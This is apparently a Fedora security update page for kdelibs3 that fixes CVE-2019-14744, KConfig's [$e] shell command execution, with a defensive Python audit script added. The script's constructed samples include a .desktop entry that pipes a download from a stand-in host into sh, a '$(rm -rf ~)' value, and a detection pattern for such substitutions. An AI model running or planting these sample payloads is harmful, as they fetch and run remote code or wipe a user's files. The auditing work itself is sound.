FEDORA-2019-f9f78895c3 created by kkofler 4 months ago for Fedora 30
stable

This update fixes CVE-2019-14744 (kconfig arbitrary shell code execution) in the KDE 3 compatibility version of kdelibs used by legacy KDE 3 applications.

The full list of fixes in this kdelibs3 build:

  • fixes CVE-2019-14744 - kconfig: malicious .desktop files (and others) would execute code. KConfig had a well-meaning feature that allowed configuration files to execute arbitrary shell commands: an entry whose key carries the [$e] option is shell-expanded, and a $(command) inside such a value was run with the privileges of the user whose application parsed the file. Unfortunately, this could be abused by untrusted .desktop files (or any other file KConfig parses) to execute arbitrary code as the target user as soon as the file was parsed, without the user ever running the .desktop file. Therefore, this update removes that ill-fated feature. (Backported by Kevin Kofler from upstream: kf5-kconfig fix by David Faure, kdelibs 4 backport by Kai Uwe Broulik.)
  • adds native support for xdg-user-dirs for Desktop and Documents, reading the xdg-user-dirs configuration directly instead of shelling out to xdg-user-dir from the config file. This is needed because the Fedora kde-settings previously obtained these directories by shelling out to xdg-user-dir from the config file through the KConfig feature removed above, which no longer works after the security fix. (Backported by Kevin Kofler from Trinity Desktop / Timothy Pearson.)
  • fixes a KJS double-free that could crash legacy KDE 3 applications such as Quanta Plus when they executed JavaScript. (Backported by OpenSUSE / Wolfgang Bauer from Trinity Desktop / Timothy Pearson.)
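As an added example (not code from this update, from kdelibs3 or from Fedora), the following Python script does two things a practitioner would want after reading the first two fixes: it audits .desktop files for the pattern the CVE fix removes, namely [$e]-flagged entries whose value contains a $(...) command substitution, and it resolves the XDG user directories the way a native reader must, by parsing user-dirs.dirs without ever evaluating it as shell. The sample .desktop contents and user-dirs.dirs contents are constructed for the example, and the directory list scanned in main is an assumption about where .desktop files live on a Fedora desktop.

```python
import os
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample of a hostile .desktop file (example data, not from the
# update). A key with the [$e] option is shell-expanded by KConfig; before
# this fix a $(...) in such a value was executed as the user as soon as the
# file was parsed. [de] is a language tag, not a KConfig flag.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Innocent Tool
Name[de][$e]=$(id > /tmp/pwned)
Icon[$e]=$(curl -s http://example.invalid/p | sh)
Exec=/usr/bin/true
Path[$e]=$HOME/Documents
"""

# Constructed sample of ~/.config/user-dirs.dirs. The file uses shell syntax,
# which is why kde-settings used to obtain the paths by shelling out; a native
# reader must pick the paths out without ever evaluating the file.
SAMPLE_USER_DIRS = """# This file is written by xdg-user-dirs-update
XDG_DESKTOP_DIR="$HOME/Desktop"
XDG_DOCUMENTS_DIR="$HOME/Documents"
XDG_DOWNLOAD_DIR="/srv/downloads"
XDG_MUSIC_DIR="$(rm -rf ~)"
XDG_VIDEOS_DIR=~/Videos
"""

# key, then zero or more [...] option blocks, then '=' and the value
_ENTRY_RE = re.compile(r'^([^=\[\s][^=\[]*)((?:\[[^\]]*\])*)=(.*)$')
_OPTION_RE = re.compile(r'\[([^\]]*)\]')


def shell_expanded_entries(text: str) -> List[Tuple[str, str, bool]]:
    """Return (key, value, has_command_substitution) for every entry whose
    key carries a KConfig option block with the 'e' flag ([$e], [$ei], ...).
    Plain $VAR expansion is reported with False; $(...) with True."""
    found = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in '#[':      # comments and [Group] headers
            continue
        m = _ENTRY_RE.match(line)
        if not m:
            continue
        key, opts, value = m.group(1).strip(), m.group(2), m.group(3)
        flags = ''.join(o[1:] for o in _OPTION_RE.findall(opts) if o.startswith('$'))
        if 'e' in flags:
            found.append((key, value, '$(' in value))
    return found


def audit_desktop_files(directories: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Walk directories and report (path, key, value) for every [$e] entry
    that contains a $(...) command substitution."""
    hits = []
    for d in directories:
        for root, _dirs, files in os.walk(os.path.expanduser(d)):
            for name in files:
                if not name.endswith('.desktop'):
                    continue
                path = os.path.join(root, name)
                try:
                    with open(path, encoding='utf-8', errors='replace') as fh:
                        entries = shell_expanded_entries(fh.read())
                except OSError:
                    continue
                hits.extend((path, k, v) for k, v, subst in entries if subst)
    return hits


def parse_user_dirs(text: str, home: str) -> Dict[str, str]:
    """Resolve XDG_*_DIR entries without a shell: accept only "$HOME/..."
    or an absolute path and silently drop anything else (including $(...)
    and ~), so no part of the file is ever evaluated."""
    dirs = {}
    for line in text.splitlines():
        name, sep, raw = line.strip().partition('=')
        if not sep or not name.startswith('XDG_') or not name.endswith('_DIR'):
            continue
        value = raw.strip().strip('"')
        if value.startswith('$HOME/'):
            path = os.path.join(home, value[len('$HOME/'):])
        elif value.startswith('/'):
            path = value
        else:
            continue
        dirs[name[len('XDG_'):-len('_DIR')]] = os.path.normpath(path)
    return dirs


if __name__ == '__main__':
    for key, value, subst in shell_expanded_entries(SAMPLE_DESKTOP):
        print(('DANGEROUS ' if subst else 'expanded  ') + key + '=' + value)
    print(parse_user_dirs(SAMPLE_USER_DIRS, '/home/alice'))
    # Assumed locations of .desktop files on a Fedora desktop.
    for hit in audit_desktop_files(['/usr/share/applications',
                                    '~/.local/share/applications', '~/Desktop']):
        print('DANGEROUS %s: %s=%s' % hit)
```

The audit only flags $(...) under an 'e' flag, because a plain $HOME in an expanded value is the legitimate use the option was designed for; a hit on a file you did not write yourself is worth treating as hostile even on a patched system, since older unpatched KDE 3 or KDE 4 applications may still parse it.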

How to install

sudo dnf upgrade --advisory=FEDORA-2019-f9f78895c3

4 months ago: This update has been submitted for testing by kkofler.
4 months ago: This update's test gating status has been changed to 'waiting'.
4 months ago: This update's test gating status has been changed to 'ignored'.
4 months ago: This update has been pushed to testing.
4 months ago: This update's test gating status has been changed to 'greenwave_failed'.
4 months ago: This update's test gating status has been changed to 'ignored'.
4 months ago: kkofler edited this update.
4 months ago: This update has been submitted for stable by kkofler.
4 months ago: This update has been pushed to stable.

Metadata
Type: security
Severity: urgent
Karma: 0
Signed
Content Type: RPM
Test Gating
Settings
Unstable by Karma: -10
Dates
submitted: 4 months ago
in testing: 4 months ago
in stable: 4 months ago
modified: 4 months ago
BZ#1740138 CVE-2019-14744 kdelibs: malicious desktop files and configuration files lead to code execution with minimal user interaction